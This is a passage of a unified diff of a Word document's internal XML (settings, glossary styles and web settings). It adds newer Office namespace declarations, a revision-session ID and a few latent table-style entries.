xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:sl="http://schemas.openxmlformats.org/schemaLibrary/2006/main" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du">
   <w:view w:val="normal"/>
   <w:defaultTabStop w:val="720"/>
   <w:characterSpacingControl w:val="doNotCompress"/>
@@ -8904,6 +9037,7 @@
   <w:rsids>
     <w:rsidRoot w:val="00567172"/>
     <w:rsid w:val="00567172"/>
+    <w:rsid w:val="008509FA"/>
     <w:rsid w:val="00AA6F64"/>
     <w:rsid w:val="00F201B7"/>
   </w:rsids>
@@ -8929,7 +9063,7 @@
 </file>
 
 <file path=word/glossary/styles.xml><?xml version="1.0" encoding="utf-8"?>
-<w:styles xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh">
+<w:styles xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du">
   <w:docDefaults>
     <w:rPrDefault>
       <w:rPr>
@@ -9051,6 +9185,7 @@
     <w:lsdException w:name="HTML Sample" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="HTML Typewriter" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="HTML Variable" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Normal Table" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="annotation subject" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="No List" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="Outline List 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
@@ -9097,8 +9232,10 @@
     <w:lsdException w:name="Table Subtle 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="Table Web 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="Table Web 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Web 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="Balloon Text" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="Table Grid" w:uiPriority="39"/>
+    <w:lsdException w:name="Table Theme" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="Placeholder Text" w:semiHidden="1"/>
     <w:lsdException w:name="No Spacing" w:uiPriority="1" w:qFormat="1"/>
     <w:lsdException w:name="Light Shading" w:uiPriority="60"/>
@@ -9390,7 +9527,7 @@
 </file>
 
 <file path=word/glossary/webSettings.xml><?xml version="1.0" encoding="utf-8"?>
-<w:webSettings xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh">
+<w:webSettings xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du">
   <w:optimizeForBrowser/>
   <w:allowPNG/>
 </w:webSettings>
